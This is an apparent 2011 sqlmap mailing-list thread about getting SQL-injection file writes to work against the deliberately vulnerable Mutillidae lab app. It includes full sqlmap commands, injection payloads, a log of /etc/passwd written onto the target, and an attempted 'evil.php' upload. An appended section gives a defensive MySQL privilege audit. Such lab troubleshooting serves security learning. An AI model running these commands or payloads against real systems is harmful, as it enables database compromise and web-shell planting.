Hi

Thanks. It turns out I was being an idiot. With absolute paths I didn't realise 
that this also includes the destination file name. With that included, it works 
like a dream.

What I haven't managed to get going properly yet is the --os-cmd flag. The temp 
stager file does appear, but is empty, 0KB. However, I think I'll save that one 
for another day!

Regards

Chris
------------------

-----Original Message-----
From: "Bernardo Damele A. G." <bernardo.dam...@gmail.com>
Date: Wed, 6 Jul 2011 23:42:22 
To: Chris Oakley<christopher.oak...@gmail.com>
Cc: <sqlmap-users@lists.sourceforge.net>
Subject: Re: [sqlmap-users] File Writing

Hi Chris,

To me it works well:
--8<--
$ python sqlmap.py -u
"http://debian32/mutillidae/index.php?page=user-info.php" --forms -p
view_user_name --risk 3 --level 3 --parse-errors --file-write
/etc/passwd --file-dest /tmp/test --flush-session

    sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] legal disclaimer: usage of sqlmap for attacking targets without
prior mutual consent is illegal. It is the end user's responsibility
to obey all applicable local, state and federal laws. Authors assume
no liability and are not responsible for any misuse or damage caused
by this program

[*] starting at 23:26:35

[23:26:35] [INFO] setting file for logging HTTP traffic
[23:26:35] [INFO] testing connection to the target url
[23:26:35] [INFO] heuristics detected web page charset 'ascii'
[23:26:35] [INFO] searching for forms
[#1] form:
POST http://debian32:80/mutillidae/index.php?page=user-info.php
POST data: view_user_name=&password=&Submit_button=Submit
do you want to test this form? [Y/n/q]
>
Edit POST data [default:
view_user_name=&password=&Submit_button=Submit] (Warning: blank fields
detected):
do you want to fill blank fields with random values? [Y/n]
[23:26:37] [WARNING] the testable parameter 'view_user_name' you
provided is not inside the GET
[23:26:37] [INFO] using
'/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session'
as session file
[23:26:37] [INFO] flushing session file
[23:26:37] [INFO] using
'/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv'
as results file
[23:26:37] [INFO] heuristics detected web page charset 'ascii'
[23:26:37] [INFO] testing if the url is stable, wait a few seconds
[23:26:38] [INFO] url is stable
[23:26:38] [INFO] heuristic test shows that POST parameter
'view_user_name' might be injectable (possible DBMS: MySQL)
[23:26:38] [INFO] testing sql injection on POST parameter 'view_user_name'
[23:26:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:26:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[23:26:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
clause (Generic comment)'
[23:26:42] [INFO] POST parameter 'view_user_name' is 'OR boolean-based
blind - WHERE or HAVING clause (Generic comment)' injectable
[23:26:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
HAVING clause'
[23:26:42] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or
HAVING clause'
[23:26:42] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[23:26:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[23:26:42] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[23:26:42] [INFO] POST parameter 'view_user_name' is 'MySQL OR
error-based - WHERE or HAVING clause' injectable
[23:26:42] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:26:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[23:26:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:26:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[23:26:42] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
[23:26:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:26:43] [INFO] target url appears to be UNION injectable with 4 columns
[23:26:43] [INFO] POST parameter 'view_user_name' is 'MySQL UNION
query (NULL) - 1 to 10 columns' injectable
[23:26:43] [WARNING] in OR boolean-based injections, please consider
usage of switch --drop-set-cookie if you experience any problems
during data retrieval
POST parameter 'view_user_name' is vulnerable. Do you want to keep
testing the others? [y/N]
sqlmap identified the following injection points with a total of 148
HTTP(s) requests:
---
Place: POST
Parameter: view_user_name
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
    Payload: view_user_name=-5244' OR NOT (1884=1884)--
&password=bDXj&Submit_button=Submit

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: view_user_name=-3024' OR 1 GROUP BY
CONCAT(CHAR(58,97,108,119,58),(SELECT (CASE WHEN (8877=8877) THEN 1
ELSE 0 END)),CHAR(58,112,119,98,58),FLOOR(RAND(0)*2)) HAVING MIN(0)--
&password=bDXj&Submit_button=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: view_user_name=IZBb' UNION ALL SELECT NULL,
CONCAT(CHAR(58,97,108,119,58),IFNULL(CAST(CHAR(121,74,77,117,83,105,112,118,99,84)
AS CHAR),CHAR(32)),CHAR(58,112,119,98,58)), NULL,
NULL#&password=bDXj&Submit_button=Submit
---

do you want to exploit this SQL injection? [Y/n]
[23:26:46] [INFO] testing MySQL
[23:26:46] [INFO] confirming MySQL
[23:26:46] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
[23:26:46] [INFO] fingerprinting the back-end DBMS operating system
[23:26:46] [INFO] the back-end DBMS operating system is Linux
[23:26:46] [WARNING] if the problem persists with 'None' values please
try to use hidden switch --no-cast (fixing problems with some
collation issues)
do you want confirmation that the file '/tmp/test' has been
successfully written on the back-end DBMS file system? [Y/n]
[23:26:48] [INFO] the file has been successfully written and its size
is 1848 bytes, but the size differs from the local file '/etc/passwd'
(1845 bytes)
[23:26:48] [WARNING] expect junk characters inside the file as a
leftover from UNION query
[23:26:48] [INFO] you can find results of scanning in multiple targets
mode inside the CSV file
'/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv'

[*] shutting down at 23:26:48
--8<--

Cheers,
Bernardo


On 3 July 2011 18:03, Chris Oakley <christopher.oak...@gmail.com> wrote:
> Hi
>
> I'm playing with file writing.  I have a full privs root user set up in
> mysql and am using
> http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
> to play with.  I've set up a /temp folder below the web root of the app.
> I've put a file "evil.php" in the sqlmap working directory.  I've also
> changed the permissions for all users on the temp folder to write access
> allowed.
>
> I'm using the following input to try and upload this file:
>
> C:\Program Files\sqlmap-0.9>python sqlmap.py -u
> "http://localhost/mutillidae/index.php?page=user-info.php" --data
> "username=&password=&user-info-php-submit-button=View+Account+Details"
> -p "username" --proxy "http://127.0.0.1:8085"
> --file-write "evil.php" --file-dest "temp/evil.php"
>
> This is with the latest dev build by the way.
>
> The output I get is:
>
> [18:00:03] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows
> web application technology: PHP 5.3.5, Apache 2.2.17
> back-end DBMS: MySQL 5.0
> [18:00:03] [INFO] fingerprinting the back-end DBMS operating system
> [18:00:03] [INFO] the back-end DBMS operating system is Windows
> [18:00:04] [WARNING] if the problem persists with 'None' values please try
> to use hidden switch --no-cast (fixing problems with some collation issues)
> do you want confirmation that the file 'temp/evil.php' has been successfully
> written on the back-end DBMS file system? [Y/n]
> [18:00:12] [WARNING] it looks like the file has not been written, this can
> occur if the DBMS process' user has no write privileges in the destination path
> [18:00:12] [WARNING] expect junk characters inside the file as a leftover
> from UNION query
> [18:00:12] [INFO] Fetched data logged to text files under 'C:\Program
> Files\sqlmap-0.9\output\localhost'
>
> [*] shutting down at 18:00:12
>
> and sure enough the file isn't written.  I've also tried using the --no-cast
> switch, to no avail.
>
> Does anyone have any ideas on what could be going wrong here?  I can use the
> --file-read switch to read any file such as C:\boot.ini.  The --os-cmd and
> --os-pwn commands also fail at the stager upload phase, probably for similar
> reasons.
>
> Any help would be appreciated
>
> Cheers
>
> Chris
>
>
> ------------------------------------------------------------------------------
> All of the data generated in your IT infrastructure is seriously valuable.
> Why? It contains a definitive record of application performance, security
> threats, fraudulent activity, and more. Splunk takes this data and makes
> sense of it. IT sense. And common sense.
> http://p.sf.net/sfu/splunk-d2d-c2
>_______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
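The two conditions that decided the outcome in this thread (the injected account holds MySQL's FILE privilege, and the DBMS process can write to the destination path) are also the points a DBA should audit. The following is an added example, not code from the thread or from the sqlmap project; the account name 'webapp'@'localhost' and the schema name mutillidae are assumptions.

```sql
-- Constructed audit for a MySQL server reachable from a web application.
-- sqlmap's --file-write on MySQL relies on a UNION-based SELECT ... INTO DUMPFILE,
-- which only works for an account holding the global FILE privilege.

-- 1. Which accounts can write server-side files at all? The test rig in the
--    thread used a "full privs root user"; an application account should never
--    appear in this result set.
SELECT user, host
FROM mysql.user
WHERE File_priv = 'Y';

-- 2. Is server-side file I/O confined to a directory? An empty value means
--    unrestricted; a directory limits INTO OUTFILE/DUMPFILE and LOAD_FILE()
--    to that path; NULL disables them on server versions that accept it.
--    The variable is read-only at runtime, so it is set in my.cnf under [mysqld].
SELECT @@global.secure_file_priv;

-- 3. Least-privilege fix for the application account (hypothetical name):
--    remove FILE and grant only the DML the application needs on its own schema.
REVOKE FILE ON *.* FROM 'webapp'@'localhost';
GRANT SELECT, INSERT, UPDATE, DELETE ON mutillidae.* TO 'webapp'@'localhost';
FLUSH PRIVILEGES;
```

Pair the privilege change with a filesystem check that the mysqld service account cannot write below the web root; the second warning in Chris's log is exactly that condition blocking the write.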